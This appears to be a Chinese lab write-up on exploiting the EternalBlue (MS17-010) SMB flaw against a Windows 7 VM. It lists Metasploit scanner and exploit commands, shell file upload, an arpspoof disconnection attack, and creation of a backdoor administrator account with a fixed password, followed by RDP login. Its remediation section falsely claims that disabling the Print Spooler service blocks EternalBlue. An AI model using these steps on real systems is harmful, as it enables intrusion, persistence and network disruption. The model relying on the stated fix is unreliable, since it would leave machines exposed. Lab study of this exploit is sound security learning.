【永恒之蓝】全网最全的永恒之蓝

永恒之蓝

【实验原理】

   “永恒之蓝”漏洞工具利用了windows7中c v e - 2 0 1 7 -0144漏洞。cve -2017-0144漏洞错误处理了网络传入的数据长度,导致复制数据时出现内存溢出。

溢出的数据覆盖了用于接收数据的内存区域指针,把合法地址修改成了系统保留区域(KI_USER_SHARED_DATA0xf fdf0000)的地址,导致后续发来的数据覆盖了系统保留区域。系统保留区域中存放了系统调用返回(SystemCallReturn)地址,从而在网络接收系统调用完成后会跳转到攻击者精心布置的代码中,使攻击者成功执行shellcode获得超级用户权限。

Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,电脑只要开机,攻击者就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币。

【实验步骤】

 一、配置靶场环境

1)确保在windows7关闭防火墙和自动更新。

2)确保靶机(Windows系统)已开启,并连接到与Kali系统相同的网络。

二、永恒之蓝攻击准备

1)在攻击通过msfconsole命令打开msf功能

2)搜索ms17-010脚本使用ms17-010辅助功能,对靶机进行扫描,信息收集,配置靶机ip

3)检测到可能存在永恒之蓝漏洞ms17-010

三、建立TCP连接并攻击

(1)切换到攻击模块,并查看配置项,配置靶机ip

(2)攻击靶机

四、登录到靶机的shell界面

五、利用这个漏洞进行操作

   (1)上传文件(使用照片代替bug程序)

   (2)进行ARP断网攻击

六、提权与远程桌面设置

    (1)查看远程端口是否开启,如果没有开启就开启该端口

    (2)创建新用户,并将其添加进管理员组

七、远程桌面登录与后渗透攻击

(1)使用Kali自带的远程连接工具进行连接xfreerdp

八、漏洞修复与验证

(1)找到windows7的Print Spooler服务,并禁用后,再进行攻击

(2)重新开启Print Spooler服务,再进行攻击

【实验流程图】

【实验结果】

一、 配置靶场环境

(1)将kali和windows7的网络配置,都配置成桥接模式,为了后面使他们在同一网段

(2)将windows7中进行设置,将系统自动更新和系统防火墙关闭,不关防火墙会出现,kali的IP地址ping不到windows7的IP地址

(3)查看windows7和kali的IP地址,查询靶机ip192.168.126.129,和攻击机ip192.168.126.130,并测试互连

ipconfig

Ping 192.168.126.129

二、永恒之蓝攻击准备

(1)在攻击通过msfconsole令打开msf功能,

msfconsole

(2)搜索ms17-010脚本,使用ms17-010辅助功能

Search ms17-010

3)对靶机进行扫描,信息收集,配置靶机IP,运行

Use auxiliary/scanner/smb/smb_ms17_010

show options

set rhosts 192.168.126.129

run

三、建立TCP连接并攻击

  1. 切换到攻击模块,并查看配置项,配置靶机ip

Use exploit/windows/smb/ms17_010_eternalblue

进行攻击

Set rhosts 192.168.126.129

run

四、登录到靶机的shell界面

shell

五、利用这个漏洞进行操作

   (1)事先在kali准备图片,可直接上传至windows中(这里用图片代替漏洞程序或bug文件)

Upload /home/kali/Desktop/1.jpg c:\\

可以看到已经上传过去了

(2)进行ARP断网攻击,查看网关,这里win7的网关是192.168.126.2

Arpspoof -I eht0 -t 192.168.126.129 192.168.126.2

这里看到win7中,已经断网了

六、提权与远程桌面设置

  1. 查看远程端口是否开启,如果没有开启就开启该端口

netstat -an

  1. 开启3389端口,并再次查看,看到已经开启

Netstat -an|find *3389*

  1. 创建新用户,并将其添加进管理员组

 net user hack 123123 /add

net localgroup administrators hack /add

七、远程桌面登录与后渗透攻击

(1)使用Kali自带的远程连接工具进行连接xfreerdp

xfreerdp/u:hack/p:123123/v:192.168.126.129/size:80%

在这里还能看到之前上传的图片

八、漏洞修复与验证

(1)找到windows7的Print Spooler服务,并禁用后,再进行攻击

Services.msc

(2)将Print Spooler服务关闭,重新攻击,可以看出禁用之后就攻击不进去了FAIL,说明Windows 7禁用Print Spooler服务后,对于永恒之蓝漏洞的攻击确实能提供一定的防御效果。

(3)重新开启Print Spooler服务,再进行攻击(重新启用服务后,一定得重启windows7,不然还是攻击不进去,注意!!!)

重新攻击,看到又攻击进去了。

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值